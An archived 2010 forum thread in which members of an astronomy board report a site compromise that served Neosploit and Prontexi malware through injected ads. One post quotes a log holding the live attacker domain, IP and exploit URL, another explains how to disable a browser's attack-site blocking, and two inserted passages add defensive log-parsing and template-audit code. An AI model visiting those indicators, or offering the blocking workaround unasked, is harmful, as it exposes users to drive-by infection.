View Full Version : Forum access and security problems 2010



Fazor
2010-Mar-29, 07:23 PM
Hmm. I'm currently unable to open threads that have been updated since, oh, about 2:00 or so. I just get a white page that says "Page not found". Old threads that have not been posted to in the last hour or so open fine.

Then I tried to just PM ToSeek since he's online and may know if anything was going on as far as server maintenance, but if I click on a user name to PM someone it says "person has not registered so no profile available". The "Members List" isn't working right either.

So let's see if I can post a thread. Anyone else having issues? If so, you probably won't be able to respond. So I guess that's a pointless question. :)

Fazor
2010-Mar-29, 07:28 PM
Interesting. If I log out, I can view the posts, then log in with the post viewed, and that works. But if I go back to the index then try to view a post, it says "page not found". So it's apparently something to do with my browser history. I suppose I should try clearing cookies.

Edit: Yep. I should have been smart enough to think of that *first*. It was a cookie issue. Like I always say, if it's not chocolate chip, then it's a bad cookie! So I suppose nothing more to see here. Carry on.

Van Rijn
2010-Mar-29, 07:31 PM
Yes, I'm getting the "Page not found" error. I get it with this thread as well.

I can click on the arrow icon by the name of the last person to post in the thread, and read backwards from there.

Fazor
2010-Mar-29, 07:37 PM
It went away completely when I cleared my cookies. *shrug*

Fazor
2010-Mar-30, 01:56 PM
Blah. Now today the little post-indicator icons (such as the arrow, the 'You've posted to this thread', etc) aren't loading, instead replaced by text (saying "Go to first post" "You've posted X times in this thread" etc.) Very distracting. And this time clearing cookies didn't fix it. :-/

megrfl
2010-Mar-30, 02:02 PM
Blah. Now today the little post-indicator icons (such as the arrow, the 'You've posted to this thread', etc) aren't loading, instead replaced by text (saying "Go to first post" "You've posted X times in this thread" etc.) Very distracting. And this time clearing cookies didn't fix it. :-/

Same here.

ToSeek
2010-Mar-30, 02:10 PM
I've had several odd problems last night and this morning: I couldn't log in until I reset my password, and I'm sometimes (but not always) getting text rather than icons.

Argos
2010-Mar-30, 02:20 PM
and I'm sometimes (but not always) getting text rather than icons.

The same here [always getting strings].

Glom
2010-Mar-30, 02:21 PM
We've been attacked!

All kilopians, grab your weapons and proceed to the South gate. Protect the women and newbies! Mods to your towers. Send these foul beasts into the abyss!

But yeah I've got all that too. It was 404ing on the new posts button. Now none of the icons are loading. I was going to initially blame it on the iGlom.

ToSeek
2010-Mar-30, 02:21 PM
I've emailed and PMed Fraser, but he's on Pacific Time, so it's 7:21 am there, so it may take a while for him to respond.

Fazor
2010-Mar-30, 02:24 PM
I've emailed and PMed Fraser, but he's on Pacific Time, so it's 7:21 am there, so it may take a while for him to respond.

He doesn't have one of those cool red telephones like the President has? What happens if some rouge anti-astronomy faction launches a 15 megaton woo-bomb? *sigh* I just lost what little sense of safety I had left.

;)

slang
2010-Mar-30, 02:30 PM
... some rouge anti-astronomy faction ...

We have ... ways (http://www.at-products.com/cp/upfiles/20051111144302cotton%20pad80a.jpg).. to deal with those!

FWIW, I'm seeing the same, and curiously, Wikipedia is also acting funny for me, showing me the article but not in the correct layout. A couple of reloads seem to fix it.

ETA: I noticed BA was online earlier. Maybe he broke it. :)

Tensor
2010-Mar-30, 02:32 PM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT. Once the Black Hole radiates away through Hawking radiation, everything will return to normal. Or should this go into ATM?

Fazor
2010-Mar-30, 02:35 PM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT.
Ah, so they've discovered the new element ironyum.

PraedSt
2010-Mar-30, 02:40 PM
Sometimes my icons aren't loading. I'd blamed it on Chrome, but it looks like a BAUT issue.

Strange
2010-Mar-30, 02:56 PM
What happens if some rouge anti-astronomy faction launches a 15 megaton woo-bomb? *sigh* I just lost what little sense of safety I had left.

Are you trying to get round the ban on politics by using a euphemism for the euphemism for Commie?

Fazor
2010-Mar-30, 03:10 PM
Are you trying to get round the ban on politics by using a euphemism for the euphemism for Commie?
Naw, that word has always just been a "finger bender" for me (like "tongue twister" only for typing). I know how to spell it, but it just never comes out right. Let me hit the eChalk board. "Fashionable rogues wear rouge. Fashionable rogues wear rouge. Fashionable rogues wear rouge. . . . " :)

ToSeek
2010-Mar-30, 03:20 PM
Fraser has emailed me back to say he's looking into it.

gzhpcu
2010-Mar-30, 03:51 PM
Today, I get this strange format:

http://img52.imageshack.us/img52/2897/baut.jpg

Any idea what's going on??:confused:

Tensor
2010-Mar-30, 03:59 PM
Fraser's looking into it. It was being discussed in the page not found/user error thread.

Kaptain K
2010-Mar-30, 04:04 PM
Me too! I thought it was on my end, but I ran all my cleanup software, to no avail.

Buttercup
2010-Mar-30, 04:05 PM
The fields showing Online/Offline status, ability to add links or change size/color, Reply, Reply With Quote, View First Unread, Unread etc. are now nothing but white boxes with red dots or x's. :-\

Buttercup
2010-Mar-30, 04:05 PM
Oh wait...now it's all back to normal since I've posted the above. Hmmm.

Veeger
2010-Mar-30, 04:16 PM
FWIW I'm seeing it too. Like there's not enough resources to display icons and images which changes the page formatting.
(But only when I click on a forum and it displays the list of topics - topic posts appear somewhat normal)

mahesh
2010-Mar-30, 04:17 PM
'cup....seems as if it's like a tsunami wave...hasn't reached here yet...i still see the lovely reds and crosses and telling me what you are doing...well, not having a pizza!!!

have a lovely day...it's spitting rain here just now...

jlhredshift
2010-Mar-30, 04:18 PM
sci/tech still messed up

LotusExcelle
2010-Mar-30, 04:24 PM
This happens with my connection from time to time if I'm on a 1x vs an EVDO signal. The page takes too long to load the icons and some of the formatting (which I will assume is CSS but could be very wrong). Not sure if something analogous is happening here to everyone via a server-side issue, but it looks the same to me.

Buttercup
2010-Mar-30, 04:28 PM
And now I'm once again back to:
The fields showing Online/Offline status, ability to add links or change size/color, Reply, Reply With Quote, View First Unread, Unread etc. are now nothing but white boxes with red dots or x's. :-\


:lol: Oh well, it's providing a modicum of "excitement." :P

Gillianren
2010-Mar-30, 04:35 PM
All kilopians, grab your weapons and Proceed to the South gate. Protect the women and newbies!

But some of us are women and kilopians! Heck, there are even a few women who are mods! Do we go to our posts or cop out and let you protect us?

Fazor
2010-Mar-30, 04:43 PM
But some of us are women and kilopians! Heck, there are even a few women who are mods! Do we go to our posts or cop out and let you protect us?

You have ren-fair experience. I say we arm you with a mace and a sturdy buckler, and let you have at it. I'll be standing well behind you, probably hiding behind that large oak tree.

megrfl
2010-Mar-30, 04:57 PM
Flat Rate Forums has issued this statement:


Forum administrators now have the ability to pick and choose, a la carte style, the features they would like to use on their forums. For most forums this new option will result in cost savings; forums will be charged according to their selections. Many forums are opting to eliminate icons, a monthly savings of over $99.00.

I think this explains our lack of icons, but at least we still have our smilies. :) :D

captain swoop
2010-Mar-30, 05:07 PM
I have it as well.

Argos
2010-Mar-30, 05:45 PM
That's proprietary software for you. Next step, a total ban on GUI.

tdvance
2010-Mar-30, 05:47 PM
Still messed up for me. This is what I expect to see when the CSS style files aren't loading right for some reason. Why would that happen? Improper permissions, corrupted files, the disk drive it's on failing, network connection failing (the last two only apply if the CSS files are on a separate server from the other stuff).

tdvance
2010-Mar-30, 05:48 PM
wow...that was fast---hit "post reply" and it's back to normal!

BetaDust
2010-Mar-30, 06:14 PM
It still looks pretty messed up from here.

http://img715.imageshack.us/img715/5766/bautbug2.th.jpg (http://img715.imageshack.us/i/bautbug2.jpg/)

But the BAUT mainpage is looking just fine, as is my user CP?

--Dennis

PraedSt
2010-Mar-30, 06:22 PM
The formatting is normal if I use "New Posts" and "Today's Posts". The problem occurs if I go to the various sections.

DrRocket
2010-Mar-30, 06:29 PM
The formatting is normal if I use "New Posts" and "Today's Posts". The problem occurs if I go to the various sections.

The formatting appears to be stochastic.

I hope ToSeek fixes this soon. It is giving me a headache.

astromark
2010-Mar-30, 06:30 PM
Well yes... the Q and A page is gone to, gobble d land... waiting, waiting... Mother told me to be 'Responsible' I do hope this is not my fault... :)but this page looks fine.

ToSeek
2010-Mar-30, 06:43 PM
Fraser is aware of the situation and is looking into it.

EDG
2010-Mar-30, 07:00 PM
Weird, I was getting the same 'text replacing images' issue, logged out and logged back in and it was still there. Then just now I posted a reply and it's all suddenly gone back to normal again.

EDIT: And I closed the browser, came back onto BAUT later, and it's back to "text replacing images" again. Weird.

PraedSt
2010-Mar-30, 07:32 PM
WARNING

My antivirus keeps freaking out whenever I access BAUT. Something about a Trojan.

megrfl
2010-Mar-30, 07:35 PM
Me too!

Risk Name: HTTP - Neosploit Activity 3 (whatever that means)

Severity - HIGH

PraedSt
2010-Mar-30, 07:37 PM
Details:

File name: http://searchimagweb.org/cgi-bin/088\{gzip}
Malware name: JS:Prontexi-AA [Trj]
Malware type: Trojan Horse
VPS version: 100328-0, 03/28/2010

I have no idea what any of that means, but it sounds nasty.

jlhredshift
2010-Mar-30, 07:50 PM
McAfee says that this website has been reported as unsafe.

megrfl
2010-Mar-30, 07:52 PM
I get the message every time I move from one place to another within BAUT.

Moose
2010-Mar-30, 07:52 PM
Yup. Me too. "HTML/Infected.WebPage.Gen HTML script virus".

Veeger
2010-Mar-30, 07:58 PM
Ah crap. Welcome back indeed. :lol:

pzkpfw
2010-Mar-30, 08:03 PM
I have Microsoft's own filter telling me I ought not be here...

publius
2010-Mar-30, 08:04 PM
I don't know what happened, but Norton Internet Security here has started going crazy every time I log into BAUT today, blocking things as threats.

It reports the threat as "HTTP Neosploit Activity 3" and the "attacker URL" as something coming from "searchimagweb.org" with some long string in the URL that it says matches the signature of the attack. The IP address for that is 91.212.127.26.

When Norton blocks that, just about all the graphic buttons on the BAUT page fail to load. I don't know if anything is really wrong, or just by some chance some URL string happened to match a known attack signature.


-Richard

jlhredshift
2010-Mar-30, 08:05 PM
Ah crap. Welcome back indeed. :lol:

Let's see, everything is nice and quiet and somewhat boring, you come back, and the stuff hits the fan. Hmmm..... :whistle:

tdvance
2010-Mar-30, 08:07 PM
I'm still getting the (intermittent) style errors, but no virus messages---it could be because I use Adblock+ and some ad has something not so nice in it.

Veeger
2010-Mar-30, 10:28 PM
Let's see, everything is nice and quiet and somewhat boring, you come back, and the stuff hits the fan. Hmmm..... :whistle:

I know. I was getting paranoid so I just completed a scan and actually found something. Fortunately it was not related to this forum trouble. It was a fake antivirus link on an alternate user profile.

andyschlei
2010-Mar-30, 10:29 PM
I still don't get icons on the forum index pages.

And on some threads I don't have the formatting icons on the quick reply where on some I do.

Strange. I think the icons have to be worth $99/month.

slang
2010-Mar-30, 10:34 PM
As ToSeek said: Fraser is working on it, it may take some time to get everything fixed. Fortunately the problems seem to appear to everyone, so it's easy for him to see if it's fixed yet, or not.

kleindoofy
2010-Mar-30, 11:44 PM
Cool, an all new BAUT.

I volunteer to test the naughty word filter. :whistle:

(some of the smilies still seem to be broken)

Van Rijn
2010-Mar-30, 11:53 PM
Well, this looks different. It's going to take time to get used to the new look.

publius
2010-Mar-30, 11:57 PM
Wow, things have really changed now. :) Upgraded to v4, huh. But I'm not getting the security warning anymore.

For what it's worth, looking at Norton logs, it looks like it thought something on BAUT was causing the browser here to send an attack URL string to the "searchimagweb.org" site.

Googling on "Neosploit", I see that looks nasty -- tries to install a boot sector infector that loads a rootkit. I'm not infected (well, scans say I'm not), but that was scary there for a while.

-Richard

Fraser
2010-Mar-31, 12:03 AM
So you're not getting the warnings any more? Please let me know if you see them. I'm hoping the upgrade removed the exploit opening.

LaurelHS
2010-Mar-31, 12:07 AM
When I click on "find all posts," in my profile, I get a "sorry, no matches" message.

Fraser
2010-Mar-31, 12:08 AM
I'm still rebuilding all the post tables. That's going to take several hours. After that it should work.

The Backroad Astronomer
2010-Mar-31, 12:12 AM
I blame the LHC, the end of the world has begun!!!!!

publius
2010-Mar-31, 12:15 AM
Fraser,

No, Norton is giving no warnings now, thank goodness.

If it will help, here's a log entry from one of the alerts Norton reported:



3/30/2010 4:12 PM,High,An intrusion attempt by OSIRIS was blocked.,Blocked,No Action Required,HTTP Neosploit Activity 3,"OSIRIS (192.168.2.50, 5497)",searchimagweb.org/cgi-bin/088/t002106Rfc7d74b4Xc4f26b45Y8f4393b4Z0100f070201L656 e2d75730000000000,"searchimagweb.org (91.212.127.26, 80)",192.168.2.50 (192.168.2.50),"TCP, Port 5497",


OSIRIS is the name of this machine, and the 192.168... is the private IP on the LAN side of my router (shouldn't be any danger in posting that, of course). Note the long URL directed at "searchimagweb.org" -- that was what matched the "Neosploit" signature. The hack was trying to trigger the browser to send that and that's when Norton threw the red flag. Each time, the TCP source port, 5497 above, was something different, but the attacker URL was the same.
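
The log line above is the kind of record an incident responder ends up collecting from many machines, so here is an added example (not part of the post, and not Norton's own tooling) that parses that comma-separated format into structured events and boils a batch of alerts down to the indicators worth acting on: signature, attacker host, IP, URL, and the local source ports. The column positions are inferred from the single line posted, so treat that mapping as an assumption. The first sample line is the posted entry copied verbatim (including the space inside the URL as it appears on the page); the other two are constructed to reproduce what the poster described, the same attacker URL with a different local source port each time.

```python
import csv
import io
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Line 1 is the Norton entry as posted in the thread. Lines 2 and 3 are
# constructed for this example: same signature and attacker URL, different
# local source ports, which is the pattern the poster described.
SAMPLE_LOG = (
    '3/30/2010 4:12 PM,High,An intrusion attempt by OSIRIS was blocked.,Blocked,'
    'No Action Required,HTTP Neosploit Activity 3,"OSIRIS (192.168.2.50, 5497)",'
    'searchimagweb.org/cgi-bin/088/t002106Rfc7d74b4Xc4f26b45Y8f4393b4Z0100f070201L656 e2d75730000000000,'
    '"searchimagweb.org (91.212.127.26, 80)",192.168.2.50 (192.168.2.50),"TCP, Port 5497",\n'
    '3/30/2010 4:15 PM,High,An intrusion attempt by OSIRIS was blocked.,Blocked,'
    'No Action Required,HTTP Neosploit Activity 3,"OSIRIS (192.168.2.50, 5512)",'
    'searchimagweb.org/cgi-bin/088/t002106Rfc7d74b4Xc4f26b45Y8f4393b4Z0100f070201L656 e2d75730000000000,'
    '"searchimagweb.org (91.212.127.26, 80)",192.168.2.50 (192.168.2.50),"TCP, Port 5512",\n'
    '3/30/2010 4:20 PM,High,An intrusion attempt by OSIRIS was blocked.,Blocked,'
    'No Action Required,HTTP Neosploit Activity 3,"OSIRIS (192.168.2.50, 5530)",'
    'searchimagweb.org/cgi-bin/088/t002106Rfc7d74b4Xc4f26b45Y8f4393b4Z0100f070201L656 e2d75730000000000,'
    '"searchimagweb.org (91.212.127.26, 80)",192.168.2.50 (192.168.2.50),"TCP, Port 5530",\n'
)

# Matches endpoint fields such as "OSIRIS (192.168.2.50, 5497)" and
# "searchimagweb.org (91.212.127.26, 80)": a name, then (ip, port).
ENDPOINT_RE = re.compile(
    r"^(?P<name>.+?) \((?P<ip>\d{1,3}(?:\.\d{1,3}){3}), (?P<port>\d+)\)$"
)


@dataclass(frozen=True)
class IntrusionEvent:
    timestamp: str
    severity: str
    signature: str
    local_ip: str
    local_port: int
    attacker_host: str
    attacker_ip: str
    attacker_port: int
    attacker_url: str


def parse_norton_log(text: str) -> List[IntrusionEvent]:
    """Parse Norton's comma-separated history export into events.

    Column positions are inferred from the posted line (an assumption):
    0 timestamp, 1 severity, 5 signature, 6 local endpoint, 7 attacker URL,
    8 attacker endpoint. Blank or too-short rows are skipped, not guessed at.
    """
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 9:
            continue
        src = ENDPOINT_RE.match(row[6].strip())
        dst = ENDPOINT_RE.match(row[8].strip())
        if not (src and dst):
            raise ValueError(f"unrecognised endpoint fields: {row[6]!r}, {row[8]!r}")
        events.append(IntrusionEvent(
            timestamp=row[0], severity=row[1], signature=row[5],
            local_ip=src["ip"], local_port=int(src["port"]),
            attacker_host=dst["name"], attacker_ip=dst["ip"],
            attacker_port=int(dst["port"]), attacker_url=row[7].strip(),
        ))
    return events


def summarize(events: List[IntrusionEvent]) -> Dict[str, object]:
    """Collapse many alerts into the indicators a responder would block or hunt for."""
    return {
        "signatures": dict(Counter(e.signature for e in events)),
        "attacker_hosts": sorted({e.attacker_host for e in events}),
        "attacker_ips": sorted({e.attacker_ip for e in events}),
        "attacker_urls": sorted({e.attacker_url for e in events}),
        "local_ports": sorted(e.local_port for e in events),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_norton_log(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

The varying local port with a fixed attacker URL is what you would expect from a browser being made to fetch the same remote resource on every page load; the summary makes that visible at a glance, and the host and IP it extracts are the values to feed into a web proxy or DNS block list while the site itself is being cleaned.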

Cougar
2010-Mar-31, 12:17 AM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT. Once the Black Hole radiates away through Hawking radiation, everything will return to normal. Or should this go into ATM?

Had to stop here and say....

Oh, that is funny!

The Backroad Astronomer
2010-Mar-31, 12:19 AM
Oops, didn't see Tensor's earlier joke.

Cougar
2010-Mar-31, 12:27 AM
Yeah, cool new look. Very, uh, 'spacey'. :) Though I take it this wasn't a planned conversion?

LotusExcelle
2010-Mar-31, 12:40 AM
Not sure I'm a fan. The other setup was certainly utilitarian and I mean that as a compliment. This new design is streamlined in the same sense Vista is and I mean that in a bad way.

astromark
2010-Mar-31, 12:41 AM
It was not me, I did not do it. So to who did... Ya it looks good. Great, good on you... I get this from a 'V-Bulletin' whoever that is and that does not seem to have changed... I like the 'new' look but wonder why... If it's not broken do not fix it. But this thinking might have more to do with me being conservative and older....:)be encouraged.
Here in NZ the largest telecommunication network 'telecom' introduced a whole NEW 'XT' network. Oh My... what a mess... it's fallen over four times in two months... all sorts of running for cover... people are running away faster than a flood. Your problems are little'er... :):eh:

kleindoofy
2010-Mar-31, 12:55 AM
... but wonder why... If it's not broken do not fix it. ...
That's the whole point.

It was broken.

So instead of re-installing the old version (with a possible security leak which broke it in the first place), they did an upgrade.

Everybody will get used to it pretty quickly and the old one will appear "old fashioned" in no time at all.

The Backroad Astronomer
2010-Mar-31, 01:06 AM
But there will be a lot of complaining until they are used to it.

EDG
2010-Mar-31, 01:08 AM
Is there a way (or will there be?) to change the skin used on the forum on an individual basis? I guess right now the default skin is installed, I had a look through my user profile and couldn't find an obvious way to change it.

LotusExcelle
2010-Mar-31, 01:09 AM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.

Grashtel
2010-Mar-31, 01:12 AM
Not sure I'm a fan. The other setup was certainly utilitarian and I mean that as a compliment. This new design is streamlined in the same sense Vista is and I mean that in a bad way.
Hopefully Fraser is working on getting the templates for the BAUT look fixed and updated for vB4 so this is just a temporary solution due to the hack and emergency upgrade.

publius
2010-Mar-31, 01:14 AM
I absolutely hate change myself (that happens as you get older :) -- I tried to fight it, but now I'm embracing my ornery old-manness coming on), but we'll get used to it. The old software was vulnerable to some hacker exploit. Lord, I hate malware authors/hackers, and I hate that worse than change. :)

-Richard

Grashtel
2010-Mar-31, 01:14 AM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.
That is true but the server needed to be hacked to embed the malware ad into the pages in the first place so that needed to be fixed as well to prevent it happening again.

Swift
2010-Mar-31, 01:52 AM
Might I suggest that if you have suggestions about the software upgrade, that you put them in this thread (http://www.bautforum.com/showthread.php/102554-vBulletin-4-upgrade) and leave this one for the bug reports from earlier in the day. Thanks,

01101001
2010-Mar-31, 01:58 AM
Might I suggest that if you have suggestions about the software upgrade, that you put them in this thread (http://www.bautforum.com/showthread.php/102554-vBulletin-4-upgrade) and leave this one for the bug reports from earlier in the day. Thanks,

Am I colorblind or is that a case of too little contrast between the purple text and blue link (on my display in my lighting conditions)? Even if I am colorblind, those colors are not friendly to some eyes.

Fraser
2010-Mar-31, 02:11 AM
My guess is that the exploit came with a vulnerability in vBulletin. Some new hack was discovered and it was implemented by some bot that scans the web looking for vulnerable sites. By upgrading to version 4, it would remove all the old exploit vulnerabilities. The server is Linux, and it's unlikely that the attack happened deeper in the Operating System.

That said, I'm going to be moving the site to a new server in the next couple of days, so that should resolve any possible vulnerabilities in the OS.

astromark
2010-Mar-31, 05:26 AM
So it was busted and has been fixed... You's are good for it.

I said that if it ain't broken don't... well it was and you did... Great... I am unaware of the timing of all of this... I sleep while you fix :) thank you.

HenrikOlsen
2010-Mar-31, 12:32 PM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.
The hack with changes to the files on the server had been confirmed by Fraser; the virus that came with the ads replacing the usual ones was just a symptom.
The bit I noticed was that the icons had stopped working in all the sub-fora because the modified template referred to them with a relative link and this made their address wrong.
This I confirmed as being an actual problem by accessing the site directly without a browser (wget is your friend).
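
The check described in this post, fetching the page outside a browser and inspecting what the template actually references, can be scripted so it runs against every sub-forum after a cleanup. The following is an added example, not the poster's wget session or any vBulletin code: it collects every resource-bearing attribute from a page, flags references that resolve to a host outside the site's own allow list (the shape injected ad code takes), and separately flags path-relative references, whose resolved address changes with the page's own path, which is the icon breakage the post describes. The sample HTML is constructed, malicious-ad.example is a placeholder, and the two page URL shapes are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags whose attribute pulls in a resource; a tampered template typically
# gains a new <script> or <iframe> here.
RESOURCE_ATTRS = {
    "script": "src",
    "iframe": "src",
    "img": "src",
    "link": "href",
    "embed": "src",
    "object": "data",
}

# Hosts the forum legitimately serves resources from (site name from the thread).
ALLOWED_HOSTS = {"www.bautforum.com", "bautforum.com"}

# Constructed sample page, not the real BAUT template: a stylesheet and a
# script on the site's own host, an icon referenced by a path-relative link
# (the pattern the post describes), and two off-site references standing in
# for injected ad code. malicious-ad.example is a placeholder host.
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="/styles/baut.css">
<script src="/scripts/forum.js"></script>
<script src="http://malicious-ad.example/cgi-bin/ad.js"></script>
</head><body>
<img src="images/statusicon/forum_new.gif" alt="new posts">
<iframe src="http://malicious-ad.example/frame" width="1" height="1"></iframe>
</body></html>
"""


class ResourceCollector(HTMLParser):
    """Collects (tag, raw_url) for every resource-bearing attribute seen."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = RESOURCE_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def audit_page(html, page_url, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per suspicious reference in the page.

    'off-site host': the reference resolves to a host outside the allow list.
    'path-relative': no scheme, no host, no leading slash, so where it resolves
    depends on the page's own path and it breaks on pages served deeper down.
    """
    collector = ResourceCollector()
    collector.feed(html)
    findings = []
    for tag, raw in collector.refs:
        parts = urlsplit(raw)
        if parts.scheme == "data":
            continue  # inline data URIs reference no host
        resolved = urljoin(page_url, raw)
        host = (urlsplit(resolved).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append({"tag": tag, "raw": raw, "resolved": resolved,
                             "issue": "off-site host"})
        elif not parts.scheme and not parts.netloc and not raw.startswith("/"):
            findings.append({"tag": tag, "raw": raw, "resolved": resolved,
                             "issue": "path-relative"})
    return findings


def resolved_icon_urls(html, page_urls):
    """Map each path-relative reference to the set of addresses it resolves
    to across the given page URLs. More than one address means the icon
    loads on some pages and 404s on others, as seen in the sub-fora."""
    out = {}
    for url in page_urls:
        for f in audit_page(html, url):
            if f["issue"] == "path-relative":
                out.setdefault(f["raw"], set()).add(f["resolved"])
    return out


if __name__ == "__main__":
    pages = [
        "http://www.bautforum.com/forumdisplay.php?f=4",        # assumed URL shape
        "http://www.bautforum.com/archive/index.php/f-4.html",  # assumed URL shape
    ]
    for f in audit_page(SAMPLE_HTML, pages[0]):
        print(f"{f['issue']:14} <{f['tag']}> {f['raw']} -> {f['resolved']}")
    for raw, resolved in resolved_icon_urls(SAMPLE_HTML, pages).items():
        print(raw, "resolves to", sorted(resolved))
```

Fetching the HTML with wget or curl rather than a browser, as the post does, matters for the same reason the poster gives: the injected code is then not executed, only read. Running the audit over a saved copy of each template before and after an upgrade also gives a simple diff of which resource hosts appeared or disappeared.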

Glom
2010-Mar-31, 12:35 PM
I was on dirty BAUT on my iPhone, home PC and laptop. It looks like Norton protected my home PC. My laptop is supposed to be protected by McAfee but it hasn't told me about anything. I don't know what has protected my iPhone. Is the iPhone vulnerable to such an attack?

Metricyard
2010-Mar-31, 01:04 PM
My Avast goes crazy until I log in. Once I've logged on the warnings go away.
But if I log off, the warnings come back.

As a matter of fact, if I log off, I get an iframe error.

Guess I'll just stay logged in.

Tensor
2010-Mar-31, 01:05 PM
I was on dirty BAUT on my iPhone, home PC and laptop. It looks like Norton protected my home PC. My laptop is supposed to be protected by McAfee but it hasn't told me about anything. I don't know what has protected my iPhone. Is the iPhone vulnerable to such an attack?

I would say the iPhone isn't. It doesn't use a Windows based OS. I didn't get any warnings yesterday on my Mac, after being on BAUT.

What I do find funny is my wife, right after we got the Mac, hit one of those click here to check for virus things. It told her all of our files were infected. But of course they were. They weren't in any recognized PC format.

Fazor
2010-Mar-31, 01:45 PM
It looks like one of those nasty faux anti-virus viruses got through here yesterday, and cropped up this morning. Our company forces us to use McAfee . . . which IMHO is the worst, most useless, yet most resource demanding piece of junk there is. We've had probably a dozen viruses on the handful of office machines we have. To my knowledge, it's never actually stopped anything. Oh well.

I did a hard shut down the second the faux anti-virus window popped up, booted into safe mode, and did a system restore to the end of last week, just in case. When completed, I was given a list of a few dll files that had been changed between the two system points, so I deleted the old (as in prior to restored) versions, just in case. In my experience with this type of infection, they can worm their way into your restore points too. It hasn't popped up again yet, knock-on-wood, so we'll see.

eburacum45
2010-Mar-31, 02:08 PM
I'm still getting lots of virus warnings, incidentally.

closetgeek
2010-Mar-31, 02:26 PM
Fazor, my daughter got that virus scan virus on her netbook. She thought it was Avast telling her that, so she let it run, then came to me and told me that her netbook is wasted.

As for BAUT, as soon as the page loaded, I would get sent to a different page, telling me that this site is unsafe. I sent out a report to microsoft and then told it to let me on anyway. Neat new system, though.

Fazor
2010-Mar-31, 02:31 PM
Fazor, my daughter got that virus scan virus on her netbook. She thought it was Avast telling her that, so she let it run, then came to me and told me that her netbook is wasted.

I had to clean that off a home machine, off my parent's laptop, and off a different computer here at work (each different occasions). It can be beaten, but man was it a helluva fight each time. Actually, come to think of it, I only personally disinfected my machine and my parents'. The other one at work was in the other office, and I sure wasn't up to trying to do that over the phone via the boss, who is exceptionally computer illiterate. They just called in an outside IT guy to fix that.

mugaliens
2010-Apr-01, 05:46 AM
I use Norton 360, and haven't had any issues either before or after the upgrade.

NEOWatcher
2010-Apr-01, 11:56 AM
I got that yesterday morning. It seems clear now, but not after it took our PC support people over 7 hours to get rid of it.
Nasty one - it wouldn't allow any applications to run. It had to be cleaned in safe mode. Trend didn't catch it, and it was cleaned with Malwarebytes.

JohnD
2010-Apr-01, 12:59 PM
JS:Prontexi - Ad infiltration malware.
See: http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/

The other was a 'common trojan', perhaps an opportunist infection, but both are new, and raise significant fears about advertising on boards.
John

Fraser
2010-Apr-01, 03:08 PM
My son installed that virus on our Windows laptop about 2 months ago. I know a lot about computers, and it still took me about 3 hours to figure out how fiendish that virus was.

Fazor
2010-Apr-01, 03:58 PM
Yeah, the one that hit me here yesterday had a different twist than the ones I'd dealt with in the past; I couldn't run Task Manager to kill processes (which was really the first thing I tried to do when the fake AV window popped up.) It gave an error and said that application had been locked by the administrator. Realizing how bad that could get, I did the hard shut-down (hold the power button. I didn't want to hit the shut-down button because I've seen that even give signals to viruses to replicate themselves before the processes shut down).

But as I mentioned yesterday, a quick system-restore to a few days prior worked, or at least appeared to work. Still no more problems . . . knock-on-wood.

Siguy
2010-Apr-04, 02:12 PM
When I visited today I got a Firefox red warning page saying that it was a reported attack site. I chose to ignore the warning, but I'm wondering if we're still having security issues?
EDIT:
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-03, and suspicious content was never found on this site within the past 90 days.
So basically, we're not being hacked or anything, yet Google's listing us as suspicious? How does that work out?

Veeger
2010-Apr-04, 02:37 PM
FWIW, I have seen script bugs and malware links being installed on other servers as well. I thought it was PHPBB group problem but apparently not.

ToSeek
2010-Apr-04, 02:44 PM
Fraser thinks he has found and fixed the issue - some files got carried over to the new server that shouldn't have been.

gzhpcu
2010-Apr-04, 03:13 PM
I still get the message... :-(

Fraser
2010-Apr-04, 03:19 PM
It could be a delayed thing, where the attack is registered with them, and it takes time to go away.

Moose
2010-Apr-04, 03:41 PM
You'll need to follow the instructions on http://www.stopbadware.org/home/reviewinfo to request a review, once things are definitively fixed. It won't fall off on its own as far as I can tell.

Drunk Vegan
2010-Apr-04, 04:25 PM
Trying to load Bautforum gives me this message in Firefox: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.bautforum.com/usercp.php The entire layout is messed up (no frames, GUI looks bad, everything vertical, etc). Is this just a result of the transfer to the new server, or is Firefox correct and someone's taken advantage of a bug to plant malware on the site?

Moose
2010-Apr-04, 04:37 PM
Disabling Firefox’s badware website warnings will increase your risk of having your computer infected by drive-by downloads and other badware. If you are willing to accept this risk, you may disable the warnings in the Firefox options/preferences by clicking the Security option, unchecking “Block reported attack sites,” and clicking OK.

I don't necessarily recommend doing this, and if you do, remember to bring it back up once this is resolved. But if it's an unacceptable annoyance and you have other means of detecting problems, then it's an option.

Arneb
2010-Apr-04, 04:41 PM
Well, it's a sad thing to say, but there is always IE to view the forum...

EDG
2010-Apr-04, 04:42 PM
This is what I got just now:


Reported Attack Site!

This web site at www.bautforum.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


